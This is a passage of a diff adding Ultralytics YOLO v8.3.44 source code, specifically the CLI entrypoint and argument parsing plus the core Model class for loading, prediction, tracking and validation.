for return if user call `yolo solutions help` + return + + cls, method = SOLUTION_MAP[s_n] # solution class name, method name and default source + + from ultralytics import solutions # import ultralytics solutions + + solution = getattr(solutions, cls)(IS_CLI=True, **overrides) # get solution class i.e ObjectCounter + process = getattr(solution, method) # get specific function of class for processing i.e, count from ObjectCounter + + cap = cv2.VideoCapture(solution.CFG["source"]) # read the video file + + # extract width, height and fps of the video file, create save directory and initialize video writer + import os # for directory creation + from pathlib import Path + + from ultralytics.utils.files import increment_path # for output directory path update + + w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS)) + if s_n == "analytics": # analytical graphs follow fixed shape for output i.e w=1920, h=1080 + w, h = 1920, 1080 + save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False) + save_dir.mkdir(parents=True, exist_ok=True) # create the output directory + vw = cv2.VideoWriter(os.path.join(save_dir, "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h)) + + try: # Process video frames + f_n = 0 # frame number, required for analytical graphs + while cap.isOpened(): + success, frame = cap.read() + if not success: + break + frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame) + vw.write(frame) + if cv2.waitKey(1) & 0xFF == ord("q"): + break + finally: + cap.release() + + +def handle_streamlit_inference(): + """ + Open the Ultralytics Live Inference Streamlit app for real-time object detection. + + This function initializes and runs a Streamlit application designed for performing live object detection using + Ultralytics models. It checks for the required Streamlit package and launches the app. + + Examples: + >>> handle_streamlit_inference() + + Notes: + - Requires Streamlit version 1.29.0 or higher. + - The app is launched using the 'streamlit run' command. + - The Streamlit app file is located in the Ultralytics package directory. + """ + checks.check_requirements("streamlit>=1.29.0") + LOGGER.info("💡 Loading Ultralytics Live Inference app...") + subprocess.run(["streamlit", "run", ROOT / "solutions/streamlit_inference.py", "--server.headless", "true"]) + + +def parse_key_value_pair(pair: str = "key=value"): + """ + Parses a key-value pair string into separate key and value components. + + Args: + pair (str): A string containing a key-value pair in the format "key=value". + + Returns: + key (str): The parsed key. + value (str): The parsed value. + + Raises: + AssertionError: If the value is missing or empty. + + Examples: + >>> key, value = parse_key_value_pair("model=yolo11n.pt") + >>> print(f"Key: {key}, Value: {value}") + Key: model, Value: yolo11n.pt + + >>> key, value = parse_key_value_pair("epochs=100") + >>> print(f"Key: {key}, Value: {value}") + Key: epochs, Value: 100 + + Notes: + - The function splits the input string on the first '=' character. + - Leading and trailing whitespace is removed from both key and value. + - An assertion error is raised if the value is empty after stripping. + """ + k, v = pair.split("=", 1) # split on first '=' sign + k, v = k.strip(), v.strip() # remove spaces + assert v, f"missing '{k}' value" + return k, smart_value(v) + + +def smart_value(v): + """ + Converts a string representation of a value to its appropriate Python type. + + This function attempts to convert a given string into a Python object of the most appropriate type. It handles + conversions to None, bool, int, float, and other types that can be evaluated safely. + + Args: + v (str): The string representation of the value to be converted. + + Returns: + (Any): The converted value. The type can be None, bool, int, float, or the original string if no conversion + is applicable. + + Examples: + >>> smart_value("42") + 42 + >>> smart_value("3.14") + 3.14 + >>> smart_value("True") + True + >>> smart_value("None") + None + >>> smart_value("some_string") + 'some_string' + + Notes: + - The function uses a case-insensitive comparison for boolean and None values. + - For other types, it attempts to use Python's eval() function, which can be unsafe if used on untrusted input. + - If no conversion is possible, the original string is returned. + """ + v_lower = v.lower() + if v_lower == "none": + return None + elif v_lower == "true": + return True + elif v_lower == "false": + return False + else: + try: + return eval(v) + except Exception: + return v + + +def entrypoint(debug=""): + """ + Ultralytics entrypoint function for parsing and executing command-line arguments. + + This function serves as the main entry point for the Ultralytics CLI, parsing command-line arguments and + executing the corresponding tasks such as training, validation, prediction, exporting models, and more. + + Args: + debug (str): Space-separated string of command-line arguments for debugging purposes. + + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. Using default 'format={overrides['format']}'.") + + # Run command in python + getattr(model, mode)(**overrides) # default args from model + + # Show help + LOGGER.info(f"💡 Learn more at https://docs.ultralytics.com/modes/{mode}") + + # Recommend VS Code extension + if IS_VSCODE and SETTINGS.get("vscode_msg", True): + LOGGER.info(vscode_msg()) + + +# Special modes -------------------------------------------------------------------------------------------------------- +def copy_default_cfg(): + """ + Copies the default configuration file and creates a new one with '_copy' appended to its name. + + This function duplicates the existing default configuration file (DEFAULT_CFG_PATH) and saves it + with '_copy' appended to its name in the current working directory. It provides a convenient way + to create a custom configuration file based on the default settings. + + Examples: + >>> copy_default_cfg() + # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml + # Example YOLO command with this new custom cfg: + # yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8 + + Notes: + - The new configuration file is created in the current working directory. + - After copying, the function prints a message with the new file's location and an example + YOLO command demonstrating how to use the new configuration file. + - This function is useful for users who want to modify the default configuration without + altering the original file. + """ + new_file = Path.cwd() / DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml") + shutil.copy2(DEFAULT_CFG_PATH, new_file) + LOGGER.info( + f"{DEFAULT_CFG_PATH} copied to {new_file}\n" + f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8" + ) + + +if __name__ == "__main__": + # Example: entrypoint(debug='yolo predict model=yolo11n.pt') + entrypoint(debug="") diff --git a/2024.ultralytics/v8.3.44/engine/model.py b/2024.ultralytics/v8.3.44/engine/model.py new file mode 100644 index 0000000..db8d87e --- /dev/null +++ b/2024.ultralytics/v8.3.44/engine/model.py @@ -0,0 +1,1175 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import inspect +from pathlib import Path +from typing import Dict, List, Union + +import numpy as np +import torch +from PIL import Image + +from ultralytics.cfg import TASK2DATA, get_cfg, get_save_dir +from ultralytics.engine.results import Results +from ultralytics.hub import HUB_WEB_ROOT, HUBTrainingSession +from ultralytics.nn.tasks import attempt_load_one_weight, guess_model_task, nn, yaml_model_load +from ultralytics.utils import ( + ARGV, + ASSETS, + DEFAULT_CFG_DICT, + LOGGER, + RANK, + SETTINGS, + callbacks, + checks, + emojis, + yaml_load, +) + + +class Model(nn.Module): + """ + A base class for implementing YOLO models, unifying APIs across different model types. + + This class provides a common interface for various operations related to YOLO models, such as training, + validation, prediction, exporting, and benchmarking. It handles different types of models, including those + loaded from local files, Ultralytics HUB, or Triton Server. + + Attributes: + callbacks (Dict): A dictionary of callback functions for various events during model operations. + predictor (BasePredictor): The predictor object used for making predictions. + model (nn.Module): The underlying PyTorch model. + trainer (BaseTrainer): The trainer object used for training the model. + ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. + + Examples: + >>> from ultralytics import YOLO + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict("image.jpg") + >>> model.train(data="coco8.yaml", epochs=3) + >>> metrics = model.val() + >>> model.export(format="onnx") + """ + + def __init__( + self, + model: Union[str, Path] = "yolo11n.pt", + task: str = None, + verbose: bool = False, + ) -> None: + """ + Initializes a new instance of the YOLO model class. + + This constructor sets up the model based on the provided model path or name. It handles various types of + model sources, including local files, Ultralytics HUB models, and Triton Server models. The method + initializes several important attributes of the model and prepares it for operations like training, + prediction, or export. + + Args: + model (Union[str, Path]): Path or name of the model to load or create. Can be a local file path, a + model name from Ultralytics HUB, or a Triton Server model. + task (str | None): The task type associated with the YOLO model, specifying its application domain. + verbose (bool): If True, enables verbose output during the model's initialization and subsequent + operations. + + Raises: + FileNotFoundError: If the specified model file does not exist or is inaccessible. + ValueError: If the model file or configuration is invalid or unsupported. + ImportError: If required dependencies for specific model types (like HUB SDK) are not installed. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = Model("path/to/model.yaml", task="detect") + >>> model = Model("hub_model", verbose=True) + """ + super().__init__() + self.callbacks = callbacks.get_default_callbacks() + self.predictor = None # reuse predictor + self.model = None # model object + self.trainer = None # trainer object + self.ckpt = None # if loaded from *.pt + self.cfg = None # if loaded from *.yaml + self.ckpt_path = None + self.overrides = {} # overrides for trainer object + self.metrics = None # validation/training metrics + self.session = None # HUB session + self.task = task # task type + model = str(model).strip() + + # Check if Ultralytics HUB model from https://hub.ultralytics.com + if self.is_hub_model(model): + # Fetch model from HUB + checks.check_requirements("hub-sdk>=0.0.12") + session = HUBTrainingSession.create_session(model) + model = session.model_file + if session.train_args: # training sent from HUB + self.session = session + + # Check if Triton Server model + elif self.is_triton_model(model): + self.model_name = self.model = model + self.overrides["task"] = task or "detect" # set `task=detect` if not explicitly set + return + + # Load or create new YOLO model + if Path(model).suffix in {".yaml", ".yml"}: + self._new(model, task=task, verbose=verbose) + else: + self._load(model, task=task) + + # Delete super().training for accessing self.model.training + del self.training + + def __call__( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Alias for the predict method, enabling the model instance to be callable for predictions. + + This method simplifies the process of making predictions by allowing the model instance to be called + directly with the required arguments. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of + the image(s) to make predictions on. Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. + + Examples: + >>> Model.is_hub_model("https://hub.ultralytics.com/models/MODEL") + True + >>> Model.is_hub_model("yolo11n.pt") + False + """ + return model.startswith(f"{HUB_WEB_ROOT}/models/") + + def _new(self, cfg: str, task=None, model=None, verbose=False) -> None: + """ + Initializes a new model and infers the task type from the model definitions. + + This method creates a new model instance based on the provided configuration file. It loads the model + configuration, infers the task type if not specified, and initializes the model using the appropriate + class from the task map. + + Args: + cfg (str): Path to the model configuration file in YAML format. + task (str | None): The specific task for the model. If None, it will be inferred from the config. + model (torch.nn.Module | None): A custom model instance. If provided, it will be used instead of creating + a new one. + verbose (bool): If True, displays model information during loading. + + Raises: + ValueError: If the configuration file is invalid or the task cannot be inferred. + ImportError: If the required dependencies for the specified task are not installed. + + Examples: + >>> model = Model() + >>> model._new("yolov8n.yaml", task="detect", verbose=True) + """ + cfg_dict = yaml_model_load(cfg) + self.cfg = cfg + self.task = task or guess_model_task(cfg_dict) + self.model = (model or self._smart_load("model"))(cfg_dict, verbose=verbose and RANK == -1) # build model + self.overrides["model"] = self.cfg + self.overrides["task"] = self.task + + # Below added to allow export from YAMLs + self.model.args = {**DEFAULT_CFG_DICT, **self.overrides} # combine default and model args (prefer model args) + self.model.task = self.task + self.model_name = cfg + + def _load(self, weights: str, task=None) -> None: + """ + Loads a model from a checkpoint file or initializes it from a weights file. + + This method handles loading models from either .pt checkpoint files or other weight file formats. It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model._check_is_pytorch_model() # No error raised + >>> model = Model("yolov8n.onnx") + >>> model._check_is_pytorch_model() # Raises TypeError + """ + pt_str = isinstance(self.model, (str, Path)) and Path(self.model).suffix == ".pt" + pt_module = isinstance(self.model, nn.Module) + if not (pt_module or pt_str): + raise TypeError( + f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. " + f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported " + f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, " + f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device " + f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'" + ) + + def reset_weights(self) -> "Model": + """ + Resets the model's weights to their initial state. + + This method iterates through all modules in the model and resets their parameters if they have a + 'reset_parameters' method. It also ensures that all parameters have 'requires_grad' set to True, + enabling them to be updated during training. + + Returns: + (Model): The instance of the class with reset weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.reset_weights() + """ + self._check_is_pytorch_model() + for m in self.model.modules(): + if hasattr(m, "reset_parameters"): + m.reset_parameters() + for p in self.model.parameters(): + p.requires_grad = True + return self + + def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model": + """ + Loads parameters from the specified weights file into the model. + + This method supports loading weights from a file or directly from a weights object. It matches parameters by + name and shape and transfers them to the model. + + Args: + weights (Union[str, Path]): Path to the weights file or a weights object. + + Returns: + (Model): The instance of the class with loaded weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model() + >>> model.load("yolo11n.pt") + >>> model.load(Path("path/to/weights.pt")) + """ + self._check_is_pytorch_model() + if isinstance(weights, (str, Path)): + self.overrides["pretrained"] = weights # remember the weights for DDP training + weights, self.ckpt = attempt_load_one_weight(weights) + self.model.load(weights) + return self + + def save(self, filename: Union[str, Path] = "saved_model.pt") -> None: + """ + Saves the current model state to a file. + + This method exports the model's checkpoint (ckpt) to the specified filename. It includes metadata such as + the date, Ultralytics version, license information, and a link to the documentation. + + Args: + filename (Union[str, Path]): The name of the file to save the model to. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.save("my_model.pt") + """ + self._check_is_pytorch_model() + from copy import deepcopy + from datetime import datetime + + from ultralytics import __version__ + + updates = { + "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model, + "date": datetime.now().isoformat(), + "version": __version__, + "license": "AGPL-3.0 License (https://ultralytics.com/license)", + "docs": "https://docs.ultralytics.com", + } + torch.save({**self.ckpt, **updates}, filename) + + def info(self, detailed: bool = False, verbose: bool = True): + """ + Logs or returns model information. + + This method provides an overview or detailed information about the model, depending on the arguments + passed. It can control the verbosity of the output and return the information as a list. + + Args: + detailed (bool): If True, shows detailed information about the model layers and parameters. + verbose (bool): If True, prints the information. If False, returns the information as a list. + + Returns: + (List[str]): A list of strings containing various types of information about the model, including + model summary, layer details, and parameter counts. Empty if verbose is True. + + Raises: + TypeError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.info() # Prints model summary + >>> info_list = model.info(detailed=True, verbose=False) # Returns detailed info as a list + """ + self._check_is_pytorch_model() + return self.model.info(detailed=detailed, verbose=verbose) + + def fuse(self): + """ + Fuses Conv2d and BatchNorm2d layers in the model for optimized inference. + + This method iterates through the model's modules and fuses consecutive Conv2d and BatchNorm2d layers + into a single layer. This fusion can significantly improve inference speed by reducing the number of + operations and memory accesses required during forward passes. + + The fusion process typically involves folding the BatchNorm2d parameters (mean, variance, weight, and + bias) into the preceding Conv2d layer's weights and biases. This results in a single Conv2d layer that + performs both convolution and normalization in one step. + + Raises: + TypeError: If the model is not a PyTorch nn.Module. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.fuse() + >>> # Model is now fused and ready for optimized inference + """ + self._check_is_pytorch_model() + self.model.fuse() + + def embed( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Generates image embeddings based on the provided source. + + This method is a wrapper around the 'predict()' method, focusing on generating embeddings from an image + source. It allows customization of the embedding process through various keyword arguments. + + Args: + source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for + generating embeddings. Can be a file path, URL, PIL image, numpy array, etc. + stream (bool): If True, predictions are streamed. + **kwargs (Any): Additional keyword arguments for configuring the embedding process. + + Returns: + (List[torch.Tensor]): A list containing the image embeddings. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> image = "https://ultralytics.com/images/bus.jpg" + >>> embeddings = model.embed(image) + >>> print(embeddings[0].shape) + """ + if not kwargs.get("embed"): + kwargs["embed"] = [len(self.model.model) - 2] # embed second-to-last layer if no indices passed + return self.predict(source, stream, **kwargs) + + def predict( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + predictor=None, + **kwargs, + ) -> List[Results]: + """ + Performs predictions on the given image source using the YOLO model. + + This method facilitates the prediction process, allowing various configurations through keyword arguments. + It supports predictions with custom predictors or the default predictor method. The method handles different + types of image sources and can operate in a streaming mode. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source + of the image(s) to make predictions on. Accepts various types including file paths, URLs, PIL + images, numpy arrays, and torch tensors. + stream (bool): If True, treats the input source as a continuous stream for predictions. + predictor (BasePredictor | None): An instance of a custom predictor class for making predictions. + If None, the method uses a default predictor. + **kwargs (Any): Additional keyword arguments for configuring the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict(source="path/to/image.jpg", conf=0.25) + >>> for r in results: + ... print(r.boxes.data) # print detection bounding boxes + + Notes: + - If 'source' is not provided, it defaults to the ASSETS constant with a warning. + - The method sets up a new predictor if not already present and updates its arguments with each call. + - For SAM-type models, 'prompts' can be passed as a keyword argument. + """ + if source is None: + source = ASSETS + LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.") + + is_cli = (ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")) and any( + x in ARGV for x in ("predict", "track", "mode=predict", "mode=track") + ) + + custom = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"} # method defaults + args = {**self.overrides, **custom, **kwargs} # highest priority args on the right + prompts = args.pop("prompts", None) # for SAM-type models + + if not self.predictor: + self.predictor = (predictor or self._smart_load("predictor"))(overrides=args, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=is_cli) + else: # only update args if predictor is already setup + self.predictor.args = get_cfg(self.predictor.args, args) + if "project" in args or "name" in args: + self.predictor.save_dir = get_save_dir(self.predictor.args) + if prompts and hasattr(self.predictor, "set_prompts"): # for SAM-type models + self.predictor.set_prompts(prompts) + return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) + + def track( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + persist: bool = False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. + """ + if not hasattr(self.predictor, "trackers"): + from ultralytics.trackers import register_tracker + + register_tracker(self, persist) + kwargs["conf"] = kwargs.get("conf") or 0.1 # ByteTrack-based method needs low confidence predictions as input + kwargs["batch"] = kwargs.get("batch") or 1 # batch-size 1 for tracking in videos + kwargs["mode"] = "track" + return self.predict(source=source, stream=stream, **kwargs) + + def val( + self, + validator=None, + **kwargs, + ): + """ + Validates the model using a specified dataset and validation configuration. + + This method facilitates the model validation process, allowing for customization through various settings. It + supports validation with a custom validator or the default validation approach. The method combines default + configurations, method-specific defaults, and user-provided arguments to configure the validation process. + + Args: + validator (ultralytics.engine.validator.BaseValidator | None): An instance of a custom validator class for + validating the model. + **kwargs (Any): Arbitrary keyword arguments for customizing the validation process. + + Returns: + (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.val(data="coco8.yaml", imgsz=640) + >>> print(results.box.map) # Print mAP50-95 + """ + custom = {"rect": True} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "val"} # highest priority args on the right + + validator = (validator or self._smart_load("validator"))(args=args, _callbacks=self.callbacks) + validator(model=self.model) + self.metrics = validator.metrics + return validator.metrics + + def benchmark( + self, + **kwargs, + ): + """ + Benchmarks the model across various export formats to evaluate performance. + + This method assesses the model's performance in different export formats, such as ONNX, TorchScript, etc. + It uses the 'benchmark' function from the ultralytics.utils.benchmarks module. The benchmarking is + configured using a combination of default configuration values, model-specific arguments, method-specific + defaults, and any additional user-provided keyword arguments. + + Args: + **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. These are combined with + default configurations, model-specific arguments, and method defaults. Common options include: + - data (str): Path to the dataset for benchmarking. + - imgsz (int | List[int]): Image size for benchmarking. + - half (bool): Whether to use half-precision (FP16) mode. + - int8 (bool): Whether to use int8 precision mode. + - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda'). + - verbose (bool): Whether to print detailed benchmark information. + + Returns: + (Dict): A dictionary containing the results of the benchmarking process, 